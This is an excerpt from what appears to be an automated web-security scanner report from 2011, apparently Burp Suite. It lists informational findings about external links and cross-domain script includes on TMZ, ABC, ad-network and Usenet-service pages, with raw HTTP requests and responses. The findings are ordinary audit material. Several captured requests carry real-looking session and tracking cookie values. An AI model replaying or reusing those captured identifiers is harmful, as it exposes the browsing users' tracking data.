<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/lakers;boxad=4;pos=btf;tile=4;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/lakers;boxad=4;pos=btf;tile=4;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/E2QlpVM4se8/" target="_blank">Afternoon eye candy: Hot men of theBERRY! (61 photos)</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/orz5sQ72m6Y/" target="_blank">Take a BERRY Break (40 photos)</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/S9ln5MjkJns/" target="_blank">Nom nom COOKIE nomins (43 photos)</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.theberry.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-the-berry-v2.v2011_08_03_124001.png" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/julie-bowen-to-avoid-soccer-mom-style-at-the-emmys" target="_blank">Julie Bowen To Avoid Soccer Mom Style At The Emmys</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/david-beckham-another-baby-would-be-amazing" target="_blank">David Beckham: Another Baby Would Be &quot;Amazing&quot;</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/emily-deschanel-i-really-like-being-pregnant" target="_blank">Emily Deschanel: &quot;I Really Like Being Pregnant&quot;</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.celebritybabyscoop.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-celebritybabyscoop.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/justin-theroux-is-very-cute-with-jennifer-aniston/" target="_blank">Justin Theroux is &#039;Very Cute&#039; with Jennifer Aniston!</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/joseph-gordon-levitt-premium-rush-trailer/" target="_blank">Joseph Gordon-Levitt: &#039;Premium Rush&#039; Trailer!</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/kate-bosworth-late-night-with-jimmy-fallon-guest/" target="_blank">Kate Bosworth: &#039;Late Night with Jimmy Fallon&#039; Guest!</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.justjared.com" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cacheimages/partner-rsss-justjared_logo.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/50-cent-wants-to-achieve-hunger-relief-goal-in-two-and-a-half-years.html" target="_blank">50 Cent wants to achieve hunger relief goal in two-and-a-half years</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/joss-stone-fostering-a-dog.html" target="_blank">Joss Stone fostering a dog</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/nick-cannon-doesn-t-want-kids-in-show-business.html" target="_blank">Nick Cannon doesn&#039;t want kids in show business</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://younghollywood.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-young-hwood.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/851288-20-hot-athletes-we-want-to-see-on-dwts" target="_blank">20 Hot Athletes We Want to See on DWTS</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/850898-hope-solo-pictorial-odds-breakdown-of-her-dwts-title-hopes" target="_blank">Hope Solo: Breaking Down Her DWTS Title Hopes</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/847747-the-top-25-wags-of-the-year-so-far" target="_blank">The Top 25 Wags of the Year (So Far)</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://bleacherreport.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-bleacher-report-logo.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/nancy-grace-and-harvey-go-head-to-head-during-a-tmz-live-special-130-pdt/" target="_blank">Nancy Grace And Harvey Go Head-to-Head During A TMZ LIVE Special 1:30 PDT</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/kim-kardashian-to-executive-produce-new-pussycat-dolls-reality-show/" target="_blank">Kim Kardashian To Executive Produce New Pussycat Dolls Reality Show</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/matthew-fox-sued-over-attack-on-bus-driver/" target="_blank">Matthew Fox Sued Over Attack On Bus Driver</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.celebdirtylaundry.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-cdl-v2.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/lakers;boxad=5;pos=btf;tile=5;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/lakers;boxad=5;pos=btf;tile=5;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a><a href="http://itunes.apple.com/us/podcast/tmz-live/id418086839" target="_blank"><img src="http://ll-media.tmz.com/2011/08/04/0804-tmz-live-podcast.jpg" alt="0804-tmz-live-podcast" />
...[SNIP]...
<map name="Map" id="Map">
   <area shape="rect" coords="0,24,300,89" href="http://itunes.apple.com/us/app/tmz/id299948601?mt=8" target="_blank" alt="Download the TMZ APP for iPhone" />
   <area shape="circle" coords="40,124,17" href="http://www.tmz.com/rss.xml" target="_blank" alt="TMZ RSS feed" />
   <area shape="circle" coords="94,125,17" href="http://www.youtube.com/user/tmz/?adid=youtube" target="_blank" alt="TMZ on Youtube" />
   <area shape="circle" coords="148,123,17" href="http://www.facebook.com/TMZ?ref=ts/?adid=facebook" target="_blank" alt="TMZ on Facebook" />
   <area shape="circle" coords="208,124,17" href="http://common.prndigital.com/affiliatemap/tmz/" target="_blank" alt="Radio Affliate" />
   <area shape="circle" coords="264,124,17" href="http://www.tmz.com/tmz-tv" target="_blank" alt="TMZ on TV" />
   <area shape="rect" coords="146,177,296,190" href="http://twitter.com/#!/harveylevintmz/" target="_blank" alt="Twitter : @harveylevintmz" />
   <area shape="rect" coords="146,193,193,206" href="http://twitter.com/#!/tmz/" target="_blank" alt="Twitter : @TMZ" />
   <area shape="rect" coords="146,209,239,222" href="http://twitter.com/#!/ribeyetmz/" target="_blank" alt="Twitter : @ribeyetmz" />
</map>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/16/vanessa-hudgens-in-a-biki_n_966259.html" target="_blank" rel="nofollow">PHOTOS: Vanessa Hudgens In A Bikini</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/16/paz-de-la-huertas-unusual_n_966069.html" target="_blank" rel="nofollow">Paz De La Huerta&#039;s Unusual Red Carpet Faces (PHOTOS)</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/15/jennifer-aniston-chaz-bon_n_964967.html" target="_blank" rel="nofollow">Jennifer Aniston &amp; Chaz Bono In High School Together (PHOTO)</a>
...[SNIP]...
<center><a href="http://www.huffingtonpost.com" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-huff-po-b-w.v2011_04_06_160748.png" border="0" />
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/daily-afternoon-randomness-in-hq-41-photos/" target="_blank" rel="nofollow">Daily Afternoon Randomness in HQ (41 Photos)</a>
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/best-links-on-the-internet-418/" target="_blank" rel="nofollow">Best links on the internet</a>
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/there-are-sexy-chivers-among-us-90-photos/" target="_blank" rel="nofollow">There are Sexy Chivers Among Us (90 Photos)</a>
...[SNIP]...
<center><a href="http://thechive.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-chive-v2.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a href="http://www.buddytv.com/slideshows/how-i-met-your-mother-episode-photos-first-looks-at-martin-short-and-kal-penn-on-set-38696.aspx" target="_blank" rel="nofollow">&#039;How I Met Your Mother&#039; Episode Photos: First Looks at Martin Short and Kal Penn On Set</a>
...[SNIP]...
<li><a href="http://www.buddytv.com/slideshows/castle-episode-402-heroes-and-villains-59198.aspx" target="_blank" rel="nofollow">&#039;Castle&#039; Episode 4.02: &#039;Heroes and Villains&#039;</a>
...[SNIP]...
<li><a href="http://www.buddytv.com/articles/the-sing-off/video-meet-the-sing-off-groups-41845.aspx" target="_blank" rel="nofollow">VIDEO: Meet 8 of This Season&#039;s &#039;Sing-Off&#039; Groups Before They Take the Stage</a>
...[SNIP]...
<center><a href="http://buddytv.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-buddy-tv-cut.v2011_09_02_151959.png" border="0" />
...[SNIP]...
<li><a href="http://mediatakeout.com/51153/mto-super-world-exclusive-we-know-the-sex-of-jay-z-and-beyonce-s-baby-and-we-have-evidence.html" target="_blank" rel="nofollow">MTO SUPER-WORLD EXCLUSIVE: We Know The SEX Of Jay Z And Beyonce&#039;s BABY!!! (And We Have EVIDENCE)</a>
...[SNIP]...
<li><a href="http://mediatakeout.com/51152/nuh-uhhhhhhhh-we-feel-so-bad-for-this-little-girl-look-what-her-basic-azz-mother-named-her.html" target="_blank" rel="nofollow">NUH UHHHHHHHH!!! We Feel So BAD For This LITTLE GIRL . . . Look What Her BASIC AZZ MOTHER Named Her!!!!</a>
...[SNIP]...
<center><a href="http://www.mediatakeout.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-feed_rss-mediatakeout.v2010_03_28_201818.gif" border="0" />
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/FCrjNOEnxRU/the-crap-we-missed-friday-9-16-11-09-2011" target="_blank" rel="nofollow">The Crap We Missed ... Friday 9.16.11</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/NNmtxh4QmRY/scarlett-johansson-kieran-culkin-strip-club-09-2011" target="_blank" rel="nofollow">Kieran Culkin Took Scarlett Johansson To A Strip Club</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/zYih-_c4mbc/joe-manganiello-alcide-true-blood-single-09-2011" target="_blank" rel="nofollow">Joe Manganiello is Single</a>
...[SNIP]...
<center><a href="http://www.thesuperficial.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-superficial.v2011_04_05_095041.png" border="0" />
...[SNIP]...
<li><a href="http://www.ivillage.com/likes-or-yikes-our-favorite-entertainment-stories-week/1-j-217563" target="_blank" rel="nofollow">Likes or Yikes? Our Favorite Entertainment Stories of the Week</a>
...[SNIP]...
<li><a href="http://www.ivillage.com/elisabeth-moss-so-proud-new-mom-january-jones/1-a-383210" target="_blank" rel="nofollow">Elisabeth Moss &quot;So Proud&quot; of New Mom January Jones</a>
...[SNIP]...
<li><a href="http://www.ivillage.com/x-factor-trailer-likes-or-yikes/1-a-383105" target="_blank" rel="nofollow">&#039;X Factor&#039; Trailer: Likes or Yikes?</a>
...[SNIP]...
<center><a href="http://www.ivillage.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-ivillage.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/jennifer-aniston-justin-theroux-step-out-in-nyc-photos/" target="_blank" rel="nofollow">Jennifer Aniston &amp; Justin Theroux Stroll Hand in Hand in NYC (PHOTOS)</a>
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/ryan-gosling-reveals-favorite-justin-bieber-song-mickey-mouse-club-regrets-video/" target="_blank" rel="nofollow">Ryan Gosling Reveals Favorite Justin Bieber Song, &#039;Mickey Mouse Club&#039; Regrets (VIDEO)</a>
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/lacey-schwimmers-high-waisted-jeans-yay-or-nay-photos/" target="_blank" rel="nofollow">Lacey Schwimmer&#039;s High Waisted Jeans: Yay or Nay (PHOTOS)</a>
...[SNIP]...
<center><a href="http://www.celebuzz.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-asset-cb-cut.v2011_09_02_151959.png" border="0" />
...[SNIP]...
<li><a href="http://www.tvguide.com/News/Glee-Exclusive-Video-Premiere-1037418.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">Glee Exclusive: Watch the First 36 Seconds of the Season 3 Premiere ... Who Else Is a Junior?</a>
...[SNIP]...
<li><a href="http://www.tvguide.com/News/MTV-Scripted-Reality-Shows-1037419.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">MTV Orders Two New Scripted Series, Four Reality Shows</a>
...[SNIP]...
<li><a href="http://www.tvguide.com/News/Happy-Endings-Fred-Savage-1037417.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">ABC Offers Fred Savage Happy Endings</a>
...[SNIP]...
<center><a href="http://www.tvguide.com" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-tv-guide-cut.v2011_09_02_161258.gif" border="0" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> |
<a href="http://www.warnerbros.com/#/page=privacy-policy/" rel="nofollow" target="_blank">Privacy Policy</a> |
<a href="http://www.warnerbros.com/#/page=terms-of-use/" rel="nofollow" target="_blank">Terms of Use</a>
...[SNIP]...
<span style="font-weight:bold; position: absolute; right: 25px;top: 25px;"><a target="_blank" href="http://www.huffingtonpost.com/">HPMG News</a>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=3000013&c3=3000013&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /></noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-404979h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-21jBY4_vbHNJQ.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gumgum.com/javascripts/ggv2.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

17.169. http://www.usenetbinaries.com/l/newsgroups.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usenetbinaries.com
Path:   /l/newsgroups.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /l/newsgroups.html?r=aw;kw=usenet&gclid=CLHh78_AoqsCFRRSgwod8HVslQ HTTP/1.1
Host: www.usenetbinaries.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:26 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 6237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>
Newsgroups - Usenet Binaries Dot Com
</title>

<meta name="keywords" con
...[SNIP]...
<!-- Google Analytics -->

<script src="https://ssl.google-analytics.com/urchin.js"
type="text/javascript">

</script>
...[SNIP]...

18. Cross-domain script include  previous  next
There are 205 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


18.1. http://3ps.go.com/DynamicAd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://3ps.go.com
Path:   /DynamicAd

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french HTTP/1.1
Host: 3ps.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:07 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV06
Content-Length: 537
Cache-control: no-cache
Pragma: no-cache

<script type="text/javascript">
var CasaleArgs = new Object();
CasaleArgs.version = 2;
CasaleArgs.adUnits = "2";
CasaleArgs.casaleID = 93093;
</script>
<script type="text/javascript" src="http://js.casalemedia.com/casaleJTag.js"></script>
...[SNIP]...

18.2. http://abc.csar.go.com/DynamicCSAd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abc.csar.go.com
Path:   /DynamicCSAd

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /DynamicCSAd?srvc=abc&itype=FPBranding&itype=SponsoredByLogo&itype=Footer&itype=Footer2&itype=Footer3&itype=RevenueScience&itype=PopUnder&itype=Banner-Unicast&itype=LRGutters&itype=Background&itype=Survey&itype=Banner&itype=Rectangles&url=/primetime/charlies-angels/bios HTTP/1.1
Host: abc.csar.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240959985%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bbios%255Eabccom%253Aprimetime%253Acharlies-angels%253Aindex%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:05:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: SRV06
Content-Type: application/x-javascript
Content-Length: 4610
Cache-control: no-cache, max-age=0, must-revalidate
Pragma: no-cache


var digHeaderText = "";
function digAdDataContainer(insertionType, creativeHeader, creativeText) {
this.insertionType = insertionType;
this.creative = new Object();
this.creative.he
...[SNIP]...
</div>');

digAdData['RevenueScience'] = new digAdDataContainer('RevenueScience', '', '<script type="text/javascript" src="http://adsatt.abc.starwave.com/ad/sponsors/utilities/detect/main.js"></script>
...[SNIP]...
</script>\n<script type="text/javascript" src="http://adsatt.abc.starwave.com/ad/sponsors/utilities/qcast/main.js"></script>
...[SNIP]...

18.3. https://accounts.usenetserver.com/register/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://accounts.usenetserver.com
Path:   /register/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /register/index.php?rate=50&a_aid=uns&a_bid=a76dfb83&gclid=CLDE88zAoqsCFRRSgwod8HVslQ HTTP/1.1
Host: accounts.usenetserver.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.14-pl0-gentoo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 28134
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<title>Register - UseNetServer</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="a
...[SNIP]...
</script>
<script src = "https://ssl.google-analytics.com/ga.js" type = "text/javascript"></script>
...[SNIP]...
<body bgcolor="white" >
   
       <script id = "pap_x2s6df8d" type="text/javascript" src = "https://www.usenetjunction.com/scripts/trackjs.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.4. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ad?asId=1000005414307&sd=2x160x600&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=33923723&rk1=62964858&rk2=1316239321.3&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=1,2*4e62cac9*sFHmM92-82*aKPj71Zsi6DAbl_rJvyOOzXGnw==*; a=AAAAAAAAAAAAAAAAAAAAAA; __qca=P0-1177288715-1316025191253

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 423
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 160px; height: 600px; border-width: 0px;"><script type="text/javascript">
var pubId=27330;
var siteI
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
...[SNIP]...

18.5. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5781
Date: Sat, 17 Sep 2011 01:08:05 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Jul 27 11:16:02 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

